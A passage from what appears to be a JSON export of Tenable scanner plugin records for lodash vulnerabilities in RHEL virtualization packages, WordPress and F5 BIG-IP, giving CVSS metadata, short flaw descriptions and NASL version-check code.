NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'ovirt-engine-ui-extensions / ovirt-web-ui');\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-03-23T15:28:37", "description": "According to its self-reported version number, Lodash is prior to 4.17.21. It is, therefore, affected by multiple vulnerabilities:\n\n - A command injection via template. (CVE-2021-23337)\n\n - A regular expression denial of dervice via the toNumber, trim and trimEnd functions. (CVE-2020-28500)\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-04T00:00:00", "type": "nessus", "title": "Lodash < 4.17.21 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500", "CVE-2021-23337"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:lodash:lodash:*:*:*:*:*:node.js:*:*"], "id": "WEB_APPLICATION_SCANNING_113006", "href": "https://www.tenable.com/plugins/was/113006", "sourceData": "No source data", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-03T10:50:58", "description": "The remote Redhat Enterprise Linux 8 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2021:3459 advisory.\n\n - nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions (CVE-2020-28500)\n\n - nodejs-lodash: command injection via template (CVE-2021-23337)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-15T00:00:00", "type": "nessus", "title": "RHEL 8 : Red Hat Virtualization Host security and bug fix update [ovirt-4.4.8] (Moderate) (RHSA-2021:3459)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500", "CVE-2021-23337"], "modified": "2023-02-02T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:8", "p-cpe:/a:redhat:enterprise_linux:cockpit-ovirt-dashboard"], "id": "REDHAT-RHSA-2021-3459.NASL", "href": "https://www.tenable.com/plugins/nessus/165119", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:3459. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(165119);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/02\");\n\n script_cve_id(\"CVE-2020-28500\", \"CVE-2021-23337\");\n script_xref(name:\"RHSA\", value:\"2021:3459\");\n\n script_name(english:\"RHEL 8 : Red Hat Virtualization Host security and bug fix update [ovirt-4.4.8] (Moderate) (RHSA-2021:3459)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has a package installed that is affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:3459 advisory.\n\n - nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions (CVE-2020-28500)\n\n - nodejs-lodash: command injection via template (CVE-2021-23337)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-28500\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-23337\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:3459\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1928937\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1928954\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected cockpit-ovirt-dashboard package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-23337\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(78, 400);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/09/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cockpit-ovirt-dashboard\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'Red Hat 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/layered/rhel8/ppc64le/rhv-mgmt-agent/4/debug',\n 'content/dist/layered/rhel8/ppc64le/rhv-mgmt-agent/4/os',\n 'content/dist/layered/rhel8/ppc64le/rhv-mgmt-agent/4/source/SRPMS',\n 'content/dist/layered/rhel8/ppc64le/rhv-tools/4/debug',\n 'content/dist/layered/rhel8/ppc64le/rhv-tools/4/os',\n 'content/dist/layered/rhel8/ppc64le/rhv-tools/4/source/SRPMS',\n 'content/dist/layered/rhel8/x86_64/rhv-mgmt-agent/4/debug',\n 'content/dist/layered/rhel8/x86_64/rhv-mgmt-agent/4/os',\n 'content/dist/layered/rhel8/x86_64/rhv-mgmt-agent/4/source/SRPMS',\n 'content/dist/layered/rhel8/x86_64/rhv-tools/4/debug',\n 'content/dist/layered/rhel8/x86_64/rhv-tools/4/os',\n 'content/dist/layered/rhel8/x86_64/rhv-tools/4/source/SRPMS',\n 'content/dist/layered/rhel8/x86_64/rhvh-build/4/debug',\n 'content/dist/layered/rhel8/x86_64/rhvh-build/4/os',\n 'content/dist/layered/rhel8/x86_64/rhvh-build/4/source/SRPMS',\n 'content/dist/layered/rhel8/x86_64/rhvh/4/debug',\n 'content/dist/layered/rhel8/x86_64/rhvh/4/os',\n 'content/dist/layered/rhel8/x86_64/rhvh/4/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'cockpit-ovirt-dashboard-0.15.1-2.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE, 'exists_check':'redhat-release-virtualization-host-4'}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'cockpit-ovirt-dashboard');\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-03-23T15:27:01", "description": "According to its self-reported version number, the detected WordPress application is affected by multiple vulnerabilities :\n\n - A data exposure vulnerability within the REST API.\n\n - A Lodash library prior to 4.17.21 vulnerbaility.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "WordPress 5.8.x < 5.8.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500", "CVE-2021-23337", "CVE-2021-39200"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112972", "href": "https://www.tenable.com/plugins/was/112972", "sourceData": "No source data", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-03-23T15:27:04", "description": "According to its self-reported version number, the detected WordPress application is affected by multiple vulnerabilities :\n\n - A data exposure vulnerability within the REST API.\n\n - A Lodash library prior to 4.17.21 vulnerbaility.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "WordPress 5.5.x < 5.5.6 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500", "CVE-2021-23337", "CVE-2021-39200"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112969", "href": "https://www.tenable.com/plugins/was/112969", "sourceData": "No source data", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-03-23T15:27:02", "description": "According to its self-reported version number, the detected WordPress application is affected by multiple vulnerabilities :\n\n - A data exposure vulnerability within the REST API.\n\n - A Lodash library prior to 4.17.21 vulnerbaility.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "WordPress 5.2.x < 5.2.12 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500", "CVE-2021-23337", "CVE-2021-39200"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112967", "href": "https://www.tenable.com/plugins/was/112967", "sourceData": "No source data", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-03-23T15:27:00", "description": "According to its self-reported version number, the detected WordPress application is affected by multiple vulnerabilities :\n\n - A data exposure vulnerability within the REST API.\n\n - A Lodash library prior to 4.17.21 vulnerbaility.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "WordPress 5.4.x < 5.4.7 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500", "CVE-2021-23337", "CVE-2021-39200"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112968", "href": "https://www.tenable.com/plugins/was/112968", "sourceData": "No source data", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-03-23T15:27:03", "description": "According to its self-reported version number, the detected WordPress application is affected by multiple vulnerabilities :\n\n - A data exposure vulnerability within the REST API.\n\n - A Lodash library prior to 4.17.21 vulnerbaility.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "WordPress 5.7.x < 5.7.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500", "CVE-2021-23337", "CVE-2021-39200"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112971", "href": "https://www.tenable.com/plugins/was/112971", "sourceData": "No source data", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-03-23T15:27:03", "description": "According to its self-reported version number, the detected WordPress application is affected by multiple vulnerabilities :\n\n - A data exposure vulnerability within the REST API.\n\n - A Lodash library prior to 4.17.21 vulnerbaility.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "WordPress 5.6.x < 5.6.5 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500", "CVE-2021-23337", "CVE-2021-39200"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112970", "href": "https://www.tenable.com/plugins/was/112970", "sourceData": "No source data", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T14:33:13", "description": "Versions of lodash lower than 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload.\n(CVE-2019-10744)\n\nImpact\n\nAn attacker can use Function inside of vulnerable versions of lodash to execute malicious code using the Traffic Management User Interface (TMUI) or iControl REST API.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-04-24T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Lodash library vulnerability (K47105354)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL47105354.NASL", "href": "https://www.tenable.com/plugins/nessus/135940", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K47105354.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(135940);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-10744\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n\n script_name(english:\"F5 Networks BIG-IP : Lodash library vulnerability (K47105354)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Versions of lodash lower than 4.17.12 are vulnerable to Prototype\nPollution. The function defaultsDeep could be tricked into adding or\nmodifying properties of Object.prototype using a constructor payload.\n(CVE-2019-10744)\n\nImpact\n\nAn attacker can use Function inside of vulnerable versions of lodash\nto execute malicious code using the Traffic Management User Interface\n(TMUI) or iControl REST API.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K47105354\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K47105354.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10744\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", 